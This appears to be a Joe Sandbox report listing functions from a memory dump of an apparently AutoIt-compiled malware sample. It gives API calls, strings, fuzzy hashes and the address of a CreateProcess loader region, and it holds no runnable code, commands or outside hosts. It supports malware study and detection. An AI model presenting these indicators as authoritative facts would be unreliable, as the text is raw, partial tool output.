Source File: 00000000.00000002.2075184348.00000000017EE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ee000_YJwE2gTm02.jbxd

Similarity

API ID: CreateFileSleep
String ID: TBU2RCBTUXXT1M63T
API String ID: 2694422964-3404676022
Opcode ID: 18bd834c62d0620bd3c48a5ad7af32050c487a56bf4f91c029b2f11e58f9585b
Instruction ID: 8fad10120c4b9107fd8f2176daff2c51518ad07e771033b23d2e1cf0d860d5cb
Opcode Fuzzy Hash: 18bd834c62d0620bd3c48a5ad7af32050c487a56bf4f91c029b2f11e58f9585b
Instruction Fuzzy Hash: 1D518531E14248DBEF11DBB4C854BEFBBB5AF19300F004598E648BB2C1D6B91B45CBA5

Function 00903B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00903B0F,SwapMouseButtons,00000004,?), ref: 00903B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00903B0F,SwapMouseButtons,00000004,?), ref: 00903B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00903B0F,SwapMouseButtons,00000004,?), ref: 00903B83

Strings

Control Panel\Mouse, xrefs: 00903B3E

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 772a35f9cdd5dbb1479044f5141b4ae72f04c7928447fddc93299059c95a28cd
Instruction ID: 2afa00f1f781b056f86375672bd4f7247dfb9a96213a9ebd71bd173d37403440
Opcode Fuzzy Hash: 772a35f9cdd5dbb1479044f5141b4ae72f04c7928447fddc93299059c95a28cd
Instruction Fuzzy Hash: B4112AB5520208FFDB208FA9DC85ABEBBBCEF05748B10895AA805D7150D2319E44AB60

Function 0090DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 009532B7

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: c1cec097f7ad0f13a84722904d53f8c4b8b85823ac8b6eb07255eb6a823a923a
Instruction ID: f9d63d1dfdb6728ac34ca25593e7c4714dcddc2b2a827a110adb1ce76d6a00ec
Opcode Fuzzy Hash: c1cec097f7ad0f13a84722904d53f8c4b8b85823ac8b6eb07255eb6a823a923a
Instruction Fuzzy Hash: 7BC29C75A04209CFCB24CF68C880BADB7B5BF58310F248969E956AB391D375ED81CB91

Function 00903923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009433A2

Part of subcall function 00906B57: _wcslen.LIBCMT ref: 00906B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00903A04

Strings

Line: , xrefs: 009433EB

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: c2d8b2bc0f8d65191296052703bfaaf8e8d27d6bf757b5049e30ac0e55eb4574
Instruction ID: c338117d166a4a45c137b984069ea75f297b6759f3177366c50585aa1c57ad6a
Opcode Fuzzy Hash: c2d8b2bc0f8d65191296052703bfaaf8e8d27d6bf757b5049e30ac0e55eb4574
Instruction Fuzzy Hash: ED31C072559300AED725EB24DC45BEBB7DCAB80714F00892BF599821D1EB749A89C7C2

Function 0091FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00920668

Part of subcall function 009232A4: RaiseException.KERNEL32(?,?,?,0092068A,?,009D1444,?,?,?,?,?,?,0092068A,00901129,009C8738,00901129), ref: 00923304

__CxxThrowException@8.LIBVCRUNTIME ref: 00920685

Strings

Unknown exception, xrefs: 00920692

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 94f312fdae7d69a95f161da463288a85379603bc33107fbae7d92f0d7fe43042
Instruction ID: 02375ced8622513db54bfbd4ecf5da886ce7141ac7b5645e6398ce09cdd2355e
Opcode Fuzzy Hash: 94f312fdae7d69a95f161da463288a85379603bc33107fbae7d92f0d7fe43042
Instruction Fuzzy Hash: 46F0C234A0021DB7CB00B6A8F856EAE7B6C5EC0350B604535B828D69DBEF71DB65C5C1

Function 017EFAC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 017EFB0D
ExitProcess.KERNEL32(00000000), ref: 017EFB2C

Strings

D, xrefs: 017EFAD9

Memory Dump Source

Source File: 00000000.00000002.2075184348.00000000017EE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ee000_YJwE2gTm02.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
Instruction ID: 08ab99823dfb6cdb922b9aa79e8a7a9540a4635a768dda38f3ef1ad7aeed1456
Opcode Fuzzy Hash: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
Instruction Fuzzy Hash: D3F0EC7164024CABDB60EFE1CC49FEEB7BDBF08701F408509FB0A9A184DA7496088B61

Function 00973017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0097302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00973044

Strings

aut, xrefs: 00973038

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: c8e096a42722a82145662b76275f26b54e4a127b0870a797187747642575e22c
Instruction ID: 82fb307037b21e97b9e6b4f97cf8ccbf808ab59037eea9b6c6f35658eaaf9c3d
Opcode Fuzzy Hash: c8e096a42722a82145662b76275f26b54e4a127b0870a797187747642575e22c
Instruction Fuzzy Hash: 52D05BB150031477DA2097989C0DFCB3A6CD708750F4001527655D2095DAB0D544CAD0

Function 00987F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 009882F5
TerminateProcess.KERNEL32(00000000), ref: 009882FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 009884DD

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: d5c480a7dd9c644ac9898adbdc77925d66d5fde5a776497c6cb1fc259de2f305
Instruction ID: 39766de1be9954eaabd0ecfa9564e2a5102100829cb57ac523f23cafc32e9903
Opcode Fuzzy Hash: d5c480a7dd9c644ac9898adbdc77925d66d5fde5a776497c6cb1fc259de2f305
Instruction Fuzzy Hash: 1A125A71A083019FC724EF28C484B6ABBE5BF85314F54895DF8998B392DB31ED45CB92

Function 00935AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9261323ce9763c208d1066dd1aa9f37163f6f65e39c8128ebb3cdc072a9c7ecf
Instruction ID: e2eafafe1f992c26b60280977062956d1dd19b0890319ea97bb351ffd739f7e8
Opcode Fuzzy Hash: 9261323ce9763c208d1066dd1aa9f37163f6f65e39c8128ebb3cdc072a9c7ecf
Instruction Fuzzy Hash: D351DF71D006099FCB20AFA8D845FEEBBB8EF8E314F16045AF405A7291D7359901DF62

Function 009010F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00901BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00901BF4
Part of subcall function 00901BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00901BFC
Part of subcall function 00901BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00901C07
Part of subcall function 00901BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00901C12
Part of subcall function 00901BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00901C1A
Part of subcall function 00901BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00901C22

Part of subcall function 00901B4A: RegisterWindowMessageW.USER32(00000004,?,009012C4), ref: 00901BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0090136A
OleInitialize.OLE32 ref: 00901388
CloseHandle.KERNEL32(00000000,00000000), ref: 009424AB

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: a5ad99f6cedd9511f3f3996d0c32dbc09181be4397ac9c3d99c7e15c3d5f71ff
Instruction ID: 7556bb4f55631b252c08973f183589bce39648cac68861f2837cca933f469c11
Opcode Fuzzy Hash: a5ad99f6cedd9511f3f3996d0c32dbc09181be4397ac9c3d99c7e15c3d5f71ff
Instruction Fuzzy Hash: 2671A2B6AAA300AFC794DFB9BD456553BE1BB88344354822BE00AC7372E73844C0EF51

Function 0096C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00903923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00903A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0096C259
KillTimer.USER32(?,00000001,?,?), ref: 0096C261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0096C270

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: dc90f0a8926ae95960af0f21e2406c948509df60b4ad346a16e9b8e0f504e04c
Instruction ID: 5606dd011a644cafa7d3c6e8ecd24bce1ae4ff98b64dc9d12e260bb7125c99b9
Opcode Fuzzy Hash: dc90f0a8926ae95960af0f21e2406c948509df60b4ad346a16e9b8e0f504e04c
Instruction Fuzzy Hash: 7331A5B1904344AFEB32DF648895BE7BBEC9F06304F00049EE6EA97241C774AA84CB51

Function 009386AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,009385CC,?,009C8CC8,0000000C), ref: 00938704
GetLastError.KERNEL32(?,009385CC,?,009C8CC8,0000000C), ref: 0093870E
__dosmaperr.LIBCMT ref: 00938739

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 64699f445bd549356cfb9c1d2a099d44ba784ab893ce9c0c836026d2cdd9873f
Instruction ID: a09e6bebe63562384ae9d5b424c177326f57820f4061dc48dce89e8549560bc9
Opcode Fuzzy Hash: 64699f445bd549356cfb9c1d2a099d44ba784ab893ce9c0c836026d2cdd9873f
Instruction Fuzzy Hash: DD014E3660572057D6346334694B77F6B5D8BC677CF39011AF8158B1D2DEA1CC819D50

Function 0090DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 0090DB7B
DispatchMessageW.USER32(?), ref: 0090DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0090DB9F
Sleep.KERNEL32(0000000A), ref: 0090DBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 00951CC9

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: ea4be215ae56aa44f69dc66787525fa76bd98d7b8b4439f5869cffd5dca85dc9
Instruction ID: b452fc2d53251237fd7ca81afca02a4f9fd204bc1003667755acd9faf2b41a0b
Opcode Fuzzy Hash: ea4be215ae56aa44f69dc66787525fa76bd98d7b8b4439f5869cffd5dca85dc9
Instruction Fuzzy Hash: 00F054716593409BE730C7A4CC45FEA73ACEF84311F104515E649830C0DB309488DB15

Function 00972FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00972CD4,?,?,?,00000004,00000001), ref: 00972FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00972CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00973006
CloseHandle.KERNEL32(00000000,?,00972CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0097300D

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 60cb62c23816c388c9fc1e3d9ede50331a772c1ea971eb3ea4f3c777878e37be
Instruction ID: c6bc808341e2be5132c8b3ba2bc36d41d32de1844979870e0a29d9a959f0c7b9
Opcode Fuzzy Hash: 60cb62c23816c388c9fc1e3d9ede50331a772c1ea971eb3ea4f3c777878e37be
Instruction Fuzzy Hash: C1E0867229421077D2301759BC0EF8B3A1CD786B71F104211F719751D046A1250162AC

Function 00911310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 009117F6

Strings

CALL, xrefs: 009117C6

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 80ef288939a3ad690fb319a25025e04d771b70d6e80fa142c6aca210a33dac14
Instruction ID: 448ce91eb6e8e9289e2f9987e188cfb73d06c602674608353d6230bd6cdb16f6
Opcode Fuzzy Hash: 80ef288939a3ad690fb319a25025e04d771b70d6e80fa142c6aca210a33dac14
Instruction Fuzzy Hash: 6C22AB70608305AFC714DF14C490B6ABBF6BF85354F14896DF9968B3A2D736E885CB82

Function 00976EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00976F6B

Part of subcall function 00904ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00904EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00976F5A, 00976F63

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 3fc3b153e54e38dafbc1c11c5691470d5ae0cd00aa765b652cdc4d8ad8c8f81c
Instruction ID: 8a72844ef436243f8fdcd4943dc8834e092eb088db94f0d20c830ed7ce00d9a4
Opcode Fuzzy Hash: 3fc3b153e54e38dafbc1c11c5691470d5ae0cd00aa765b652cdc4d8ad8c8f81c
Instruction Fuzzy Hash: CFB174715083018FCB14EF64C891A6EF7E5AFD4310F04895DF99A972A2DB30ED45CB92

Function 00902DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00942C8C

Part of subcall function 00903AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00903A97,?,?,00902E7F,?,?,?,00000000), ref: 00903AC2

Part of subcall function 00902DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00902DC4

Strings

X, xrefs: 00942C5A

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: bf918c2dcadeab9c1da434a7d275639d10086a18131ecbd3576406796afc3e16
Instruction ID: d80675ea39eb6db0fe8adb89a72eae4fa719c9434e390f47a0eeeb95dc7eb01c
Opcode Fuzzy Hash: bf918c2dcadeab9c1da434a7d275639d10086a18131ecbd3576406796afc3e16
Instruction Fuzzy Hash: 90219371E102589FDF05EF94C849BEE7BFCAF89304F00805AE405A7281DBB85A898B61

Function 00972557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00972587

Strings

EA06, xrefs: 009725B9

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: a9bde058a2e00caee37644f8eca655ce1bef603ce77041179380e3fd1abb2754
Instruction ID: 50c2052e33bbfcd6759a8d557e5a2e6a40efdefdcef8cdaaaf5e245a42d57d0f
Opcode Fuzzy Hash: a9bde058a2e00caee37644f8eca655ce1bef603ce77041179380e3fd1abb2754
Instruction Fuzzy Hash: 8001B5729042687EDF18C7A8C856FAEBBF89B55315F00455AF196D2181E5B4E6088B60

Function 00903837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00903908

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 368be218c748982eed7d6e0df212b9fe994551d7ff399b0ce0bbae5c03d9a8e5
Instruction ID: 3672806a4cd038e4e60409517090d5e94933ac40911dd6540bffb214291a0707
